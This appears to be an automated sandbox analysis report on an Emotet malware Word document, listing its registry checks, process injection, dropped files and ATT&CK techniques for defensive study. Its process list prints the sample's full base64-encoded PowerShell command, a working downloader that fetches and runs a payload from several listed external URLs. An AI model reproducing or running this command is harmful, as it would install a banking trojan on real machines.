9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1

General

Target

Docs_8284e996aea8e5075256c03a93eaa6df.5
Sample

191013-nl85zybgcx
SHA256

9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1

Score

N/A

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	Process
4453	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
4469	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
5281	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.5.doc	WINWORD.EXE
5594	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_8284e996aea8e5075256c03a93eaa6df.5.doc	WINWORD.EXE

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
4906	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	WINWORD.EXE
4906	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
4922	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
4922	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
4922	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
4922	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
4922	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
4922	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
4922	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at	description	Process
11656	Token: SeDebugPrivilege	powershell.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

SppExtComObj.exepowershell.exe877.exetabletmspterm.exetabletmspterm.exehW7CRls57c1DA6WZ4.exetabletmspterm.exe

at	description	Process	procid_target
17406	PID 3828 wrote to memory of 2772	SppExtComObj.exe	44
23641	PID 3860 wrote to memory of 3212	powershell.exe	46
25172	PID 3212 wrote to memory of 3252	877.exe	47
36500	PID 3216 wrote to memory of 2244	tabletmspterm.exe	49
52844	PID 2244 wrote to memory of 1972	tabletmspterm.exe	50
52875	PID 1972 wrote to memory of 712	hW7CRls57c1DA6WZ4.exe	51
60766	PID 1316 wrote to memory of 3420	tabletmspterm.exe	53

Emotet Sync 1 IoCs

trojan banker

Processes:

877.exe

description	ioc	Process
Event created	Global\E145925EC	877.exe

Suspicious behavior: EmotetMutantsSpam

Drops file in system dir 24 IoCs

Processes:

877.exetabletmspterm.exehw7crls57c1da6wz4.exetabletmspterm.exe

at	description	ioc	Process
32141	File renamed	C:\Users\Admin\877.exe => C:\Windows\SysWOW64\tabletmspterm.exe	877.exe
50797	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	tabletmspterm.exe
50969	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tabletmspterm.exe
50985	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	tabletmspterm.exe
50985	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	tabletmspterm.exe
50985	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	tabletmspterm.exe
50985	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	tabletmspterm.exe
52813	File created	C:\Windows\SysWOW64\hW7CRls57c1DA6WZ4.exe	tabletmspterm.exe
60703	File renamed	C:\Windows\SysWOW64\hW7CRls57c1DA6WZ4.exe => C:\Windows\SysWOW64\tabletmspterm.exe	hw7crls57c1da6wz4.exe
81188	File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	tabletmspterm.exe
88953	File created (read-only)	C:\Windows\TEMP\11A9.tmp	tabletmspterm.exe
88953	File deleted	C:\Windows\Temp\11A9.tmp	tabletmspterm.exe
88953	File created (read-only)	C:\Windows\TEMP\11AA.tmp	tabletmspterm.exe
88953	File deleted	C:\Windows\Temp\11AA.tmp	tabletmspterm.exe
88969	File created (read-only)	C:\Windows\TEMP\11BB.tmp	tabletmspterm.exe
88969	File deleted	C:\Windows\Temp\11BB.tmp	tabletmspterm.exe
89063	File created (read-only)	C:\Windows\TEMP\121A.tmp	tabletmspterm.exe
89063	File deleted	C:\Windows\Temp\121A.tmp	tabletmspterm.exe
89125	File created	C:\Windows\SysWOW64\tabletmsptermb.exe	tabletmspterm.exe
89125	File created	C:\Windows\SysWOW64\tabletmspterma.exe	tabletmspterm.exe
89125	File opened for modification	C:\Windows\SysWOW64\tabletmsptermb.exe	tabletmspterm.exe
89125	File opened for modification	C:\Windows\SysWOW64\tabletmspterma.exe	tabletmspterm.exe
89156	File deleted	C:\Windows\SysWOW64\tabletmspterma.exe	tabletmspterm.exe
89156	File deleted	C:\Windows\SysWOW64\tabletmsptermb.exe	tabletmspterm.exe

Drops desktop.ini 1 IoCs

Processes:

hw7crls57c1da6wz4.exe

at	description	ioc	Process
60703	File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	hw7crls57c1da6wz4.exe

emotet family
family

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.5.doc" /o ""
1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:3488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAOQAwADUAMAAyADAAYwA5ADAAYwA1AD0AJwBiADgAMQAzADcANgAzADQAMwA5AGMAMABjACcAOwAkAGIAeAAyADQANwAwADQANgAwADUAMgAgAD0AIAAnADgANwA3ACcAOwAkAHgAOQAwADEAeAA0ADMAMQAyADMANQAzAD0AJwB4AGIAYwA5ADEAMgAyADAANAAzAHgAJwA7ACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgB4ADIANAA3ADAANAA2ADAANQAyACsAJwAuAGUAeABlACcAOwAkAHgAMwBjAGIAMAA0ADIAOQA1ADcANgA4AD0AJwBjAHgAMQB4AHgAeAB4ADYAYgA4ADUAJwA7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAYgBDAGwAaQBFAE4AVAA7ACQAYgBjADMAMwAwADEAOAAwAGMAMAA4AD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBpAGwAdgBlAHIAYQBuAHQALgBjAG8AbQAvAHQAZQBzAHQALwBkAHYAcgA5AC8AKgBoAHQAdABwADoALwAvAGYAaQByAHMAdABtAG4AZAAuAGMAbwBtAC8AdwBwAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAawA5ADYAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGkAdAB5AGwAYQBuAGQAZwBvAHYAYQBwAC4AbgBlAHQALwA4AGQAcQBzADUAZgB2AC8ANgBKAC8AKgBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGIAYQBzAC8AKgBoAHQAdABwADoALwAvAGYAYQB0AHQAbwByAGkAYQBpAHAAbwBuAHQAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAxAHcAaQBFAHEAUABmAE4ALwAnAC4AIgBTAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAeAAzADMANgBjADUAMAAxADAAYgAyADcAPQAnAGIAOQA2ADcAYgAxAHgAMgAwADEAMgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAzADcANQAwADAAOAAxADAAMAA1ADcAYwAgAGkAbgAgACQAYgBjADMAMwAwADEAOAAwAGMAMAA4ACkAewB0AHIAeQB7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAAuACIAZABPAFcAbgBMAGAATwBhAGQAZgBgAEkATABFACIAKAAkAHgAMwA3ADUAMAAwADgAMQAwADAANQA3AGMALAAgACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJABiADYAMgA2ADgAMQB4AGMAMwBjAHgANAA9ACcAeABiADAAMAA1AGIAMAA1ADAANgB4ADMANQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGIANAA4ADAANwA5ADAANwAwAGIAMQA5ADIAKQAuACIATABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADcAOQAxADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AEEAYABSAHQAIgAoACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJAB4ADIAYgAwADcAOAA3ADcAOAA0ADAAMAA9ACcAYgAxADAAMgAwADEAMAAxADAAMAA2ADAAJwA7AGIAcgBlAGEAawA7ACQAYgAyADAAOAAyADAAeAAwADIAYwAzADMANQA9ACcAeAAxAHgAMQAxAHgAMAA0AGMANQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAYwA1ADkAMAAwAGIAMwA4ADEAOAAyADcAPQAnAGMAMAA3ADkAOAAwADkAOQA2ADgANgA4ADkAJwA=
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:2772

C:\Users\Admin\877.exe
"C:\Users\Admin\877.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3212

C:\Users\Admin\877.exe
--406b0556
1⤵
- Emotet Sync
- Drops file in system dir
PID:3252

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3216

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
- Suspicious use of WriteProcessMemory
- Drops file in system dir
PID:2244

C:\Windows\SysWOW64\hW7CRls57c1DA6WZ4.exe
"C:\Windows\SysWOW64\hW7CRls57c1DA6WZ4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\hw7crls57c1da6wz4.exe
--18833c
1⤵
- Drops file in system dir
- Drops desktop.ini
PID:712

C:\Windows\SysWOW64\tabletmspterm.exe
"C:\Windows\SysWOW64\tabletmspterm.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1316

C:\Windows\SysWOW64\tabletmspterm.exe
--356fff06
1⤵
- Drops file in system dir
PID:3420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/712-11-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2244-8-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/3252-5-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/3420-14-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads